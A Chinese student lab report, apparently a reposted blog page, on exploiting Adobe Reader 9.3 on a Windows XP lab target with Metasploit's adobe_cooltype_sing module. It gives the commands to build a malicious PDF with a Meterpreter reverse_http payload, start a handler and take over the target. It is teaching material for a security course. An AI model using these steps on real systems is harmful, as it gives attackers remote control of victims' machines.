20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

时间:2023-02-12 20:46:28

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

实验内容

  • 初步掌握平台matesploit的使用

  • 有了初步完成渗透操作的思路

  • 本次攻击对象为:windows xp sp3 / Adobe 9.3

  • 主机为kali的ip地址为:192.168.199.220、靶机windows xp 的ip地址为:192.168.199.137

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

实验步骤

  • 使用命令msfconsole进入控制台

  • 根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_cooltype_sing),可以使用info命令查看模块的基本信息,以及参数要求,使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块

    设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_http

    之后使用命令show options来确定需要修改的参数(截图省略)

    需要设置的参数有LHOSTLPORTFILENAME

    命令为

      	set LHOST 192.168.199.220
    set LPORT 5335
    set FILENAME 5335.pdf

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

  • 使用命令exploit生成5335.pdf

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

  • 注意其生成路径,是一个隐藏文件夹,此时可以打开一个新的cmd,使用名命令cp 5335.pdf /root/5335.pdf将其移动出来

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

  • 之后退出并从新进入msf平台,使用命令msfconsole

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

  • 使用命令 use exploit/multi/handler进入监听模式,并设置好参数,确认无误后,执行exploit等待被攻击者的接听。

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

  • 连接成功,使用命令sysinfo可以轻而易举的获得靶机的信息

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

也可以使用ipconfig查看靶机信息

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

实验中遇到的问题

  • 起初在kali中生成了5335.pdf后不知道如何将其传输到靶机中(后来采用ncat传过去的),其中采用过qq邮箱进行传输,但是遇到了一下问题

    20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

    后来完成实验我在想,既然邮件能被查杀出来,难道不就说明腾讯能查看到我们的信息,有时候是个好事,利用云查杀解决一些不必要的烦恼,但是如果邮件中含有一些个人隐私信息呢,这是好事还是坏事。